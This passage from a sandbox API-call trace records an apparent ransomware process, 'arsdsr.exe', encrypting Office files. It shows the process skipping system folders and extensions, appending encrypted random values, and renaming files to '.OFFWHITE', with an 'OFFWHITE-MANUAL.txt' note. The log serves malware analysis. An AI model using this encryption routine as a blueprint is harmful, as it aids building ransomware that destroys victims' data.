CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.142] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.142] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.142] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x73960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.142] SetLastError (dwErrCode=0x0) [0146.142] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.145] GetLastError () returned 0x0 [0146.145] GetLastError () returned 0x0 [0146.145] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x73a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.145] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.145] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x73b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.145] WriteFile (in: hFile=0x218, lpBuffer=0x546ec8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546ec8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.145] GetProcessHeap () returned 0x500000 [0146.145] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x73960) returned 0x2960048 [0146.145] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.145] ReadFile (in: hFile=0x218, lpBuffer=0x2960048, nNumberOfBytesToRead=0x73960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesRead=0x295d1c0*=0x73960, lpOverlapped=0x0) returned 1 [0146.175] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.175] WriteFile (in: hFile=0x218, lpBuffer=0x2960048*, nNumberOfBytesToWrite=0x73960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesWritten=0x295d1cc*=0x73960, lpOverlapped=0x0) returned 1 [0146.177] GetProcessHeap () returned 0x500000 [0146.177] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960048 | out: hHeap=0x500000) returned 1 [0146.177] CloseHandle (hObject=0x218) returned 1 [0146.177] GetProcessHeap () returned 0x500000 [0146.177] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.177] GetProcessHeap () returned 0x500000 [0146.178] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.178] GetProcessHeap () returned 0x500000 [0146.178] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.178] GetProcessHeap () returned 0x500000 [0146.178] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.178] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" [0146.178] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.OFFWHITE" [0146.178] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.offwhite")) returned 1 [0146.179] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1789a00, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa1789a00, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x24360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="..") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="...") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="windows") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="rsa") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="programdata") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="program files") returned 1 [0146.179] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0146.179] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.179] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="WWINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" [0146.179] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.179] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.179] PathFindExtensionW (pszPath="WWINTL.DLL.trx_dll") returned=".trx_dll" [0146.179] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.179] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.180] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.180] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.180] GetProcessHeap () returned 0x500000 [0146.180] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546ed8 [0146.180] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.181] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=148320) returned 1 [0146.181] GetProcessHeap () returned 0x500000 [0146.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.181] GetProcessHeap () returned 0x500000 [0146.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.181] GetProcessHeap () returned 0x500000 [0146.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.181] GetProcessHeap () returned 0x500000 [0146.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.181] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.181] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.181] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.182] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.182] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x24360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.182] SetLastError (dwErrCode=0x0) [0146.182] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.186] GetLastError () returned 0x0 [0146.186] GetLastError () returned 0x0 [0146.186] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x24460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.186] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.186] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x24560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.186] WriteFile (in: hFile=0x218, lpBuffer=0x546ed8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546ed8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.186] GetProcessHeap () returned 0x500000 [0146.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x24360) returned 0x5607c8 [0146.186] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.186] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x24360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x24360, lpOverlapped=0x0) returned 1 [0146.196] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.196] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x24360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x24360, lpOverlapped=0x0) returned 1 [0146.196] GetProcessHeap () returned 0x500000 [0146.196] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.196] CloseHandle (hObject=0x218) returned 1 [0146.197] GetProcessHeap () returned 0x500000 [0146.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.197] GetProcessHeap () returned 0x500000 [0146.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.197] GetProcessHeap () returned 0x500000 [0146.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.197] GetProcessHeap () returned 0x500000 [0146.197] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.197] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" [0146.197] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.OFFWHITE" [0146.197] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.offwhite")) returned 1 [0146.198] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2a9c700, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa2a9c700, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x110b60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2=".") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="..") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="...") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="windows") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="rsa") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="programdata") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="appdata") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="program files") returned 1 [0146.198] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="program files (x86)") returned 1 [0146.198] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.198] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="WWINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" [0146.198] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.198] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.198] PathFindExtensionW (pszPath="WWINTL.REST.trx_dll") returned=".trx_dll" [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.198] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.199] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.199] GetProcessHeap () returned 0x500000 [0146.199] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546ee8 [0146.199] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.201] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=1117024) returned 1 [0146.201] GetProcessHeap () returned 0x500000 [0146.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.201] GetProcessHeap () returned 0x500000 [0146.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.201] GetProcessHeap () returned 0x500000 [0146.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.201] GetProcessHeap () returned 0x500000 [0146.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.201] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.201] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.201] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.201] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.201] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.201] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.201] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.202] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.202] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.202] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.202] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.202] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.202] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x110b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.202] SetLastError (dwErrCode=0x0) [0146.202] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.206] GetLastError () returned 0x0 [0146.206] GetLastError () returned 0x0 [0146.206] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x110c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.206] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.206] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x110d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.206] WriteFile (in: hFile=0x218, lpBuffer=0x546ee8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546ee8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.206] GetProcessHeap () returned 0x500000 [0146.206] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x110b60) returned 0x2a60020 [0146.207] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.207] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x110b60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x110b60, lpOverlapped=0x0) returned 1 [0146.319] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.319] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x110b60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x110b60, lpOverlapped=0x0) returned 1 [0146.322] GetProcessHeap () returned 0x500000 [0146.322] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0146.328] CloseHandle (hObject=0x218) returned 1 [0146.329] GetProcessHeap () returned 0x500000 [0146.329] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.329] GetProcessHeap () returned 0x500000 [0146.329] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.329] GetProcessHeap () returned 0x500000 [0146.329] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.329] GetProcessHeap () returned 0x500000 [0146.329] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.329] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" [0146.329] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.OFFWHITE" [0146.329] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.offwhite")) returned 1 [0146.330] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, 